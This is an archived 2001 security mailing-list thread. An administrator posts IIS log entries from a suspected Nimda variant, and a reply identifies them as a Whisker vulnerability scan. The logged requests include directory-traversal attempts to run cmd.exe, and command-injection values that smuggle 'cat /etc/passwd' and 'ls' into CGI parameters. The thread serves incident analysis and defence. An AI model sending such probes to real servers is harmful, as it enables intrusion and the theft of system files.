Security Incidents mailing list archives

RE: possible new Nimda variant

From: Steve Halligan <agent33 () geeksquad com>
Date: Fri, 16 Nov 2001 10:30:48 -0600

Looks like a Whisker scan to me.
http://www.wiretrip.net/rfp/p/doc.asp/i2/d21.htm
-Steve

-----Original Message-----
From: Howard Gleason [mailto:howard.gleason () computer org]
Sent: Friday, November 16, 2001 7:53 AM
To: incidents () securityfocus com
Subject: possible new Nimda variant


Mailer: SecurityFocus

Anyone else seen this, it hit my IIS logs last night.  It has 
some similarities to Nimda but 
not identical.
--------------------------------------------------
#Fields: date time c-ip cs-username s-sitename cs-method 
cs-uri-stem cs-uri-query 
sc-status sc-win32-status sc-bytes cs-bytes time-taken s-port 
cs-version cs(User-Agent)
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD / - 400 87 
138 19 47 80 
HTTP\1.0 -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /msadc/ - 404 
2 143 26 15 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /scripts/ - 
403 5 143 28 16 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET 
/scripts/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 
/c+dir 500 87 0 98 0 
80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cgi-bin/ - 
404 2 143 28 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /bin/ - 404 2 
143 24 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /samples/ - 
404 2 143 28 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_cnf/ - 
404 2 143 29 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_bin/ - 
404 2 143 29 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /iisadmpwd/ - 
404 2 143 30 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET 
/winnt/system32/cmd.exe /c+dir 
404 3 604 98 0 80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET 
/winnt/system32/cmd.exe /c+dir 
404 3 604 89 0 80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET 
/winnt/system32/cmd.exe /c+dir 
404 3 604 125 0 80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /Default.htm 
- 200 0 278 22 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /lanscan.ida 
- 404 2 143 33 15 
80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /lanscan.idq 
- 404 2 143 33 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cfdocs/ - 
404 2 143 27 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cfide/ - 404 
2 143 26 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD 
/_vti_inf.html - 404 2 143 35 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /tsweb - 404 
2 143 27 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD 
/_vti_bin/_vti_aut/ - 404 3 143 39 
0 80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET 
/default.asp::$DATA - 404 2 604 
39 0 80 HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /default.asp. 
- 404 2 604 35 0 80 
HTTP/1.0+ -
2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cgi-bin/ - 
404 2 143 28 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /Default.htm 
- 200 0 278 22 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /carbo.ddl - 
404 2 143 31 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /technote/ - 
404 2 143 29 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /iisadmpwd/ - 
404 2 143 30 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /cgi-dos/ - 
404 2 143 28 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /scripts/ - 
403 5 143 28 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD 
/scripts/perl.exe - 404 2 143 36 0 
80 HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD 
/mall_log_files/ - 404 2 143 35 0 
80 HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /Admin_files/ 
- 404 2 143 32 0 
80 HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /quote.html - 
404 2 604 31 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD 
/cgi-bin/ikonboard/ - 404 3 143 
38 0 80 HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /foldoc/ - 
404 2 143 27 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD 
/cgi-bin/adcycle/ - 404 3 143 36 
0 80 HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /ROADS/ - 404 
2 143 26 16 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /way-board/ - 
404 2 143 30 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD 
/cgi-bin/a1stats/ - 404 3 143 36 
0 80 HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /index.php 
chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc 404 2 604 71 0 80 HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /scripts/shopplus.cgi 
dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd| 
404 2 604 98 0 80 
HTTP/1.0+ -
2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /edit_image.php 
dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20 404 2 604 
86 0 80 HTTP/1.0+ -

--------------------------------------------------------------
--------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

possible new Nimda variant Howard Gleason (Nov 16)
- <Possible follow-ups>
- RE: possible new Nimda variant Steve Halligan (Nov 16)
- Re: possible new Nimda variant zeno (Nov 16)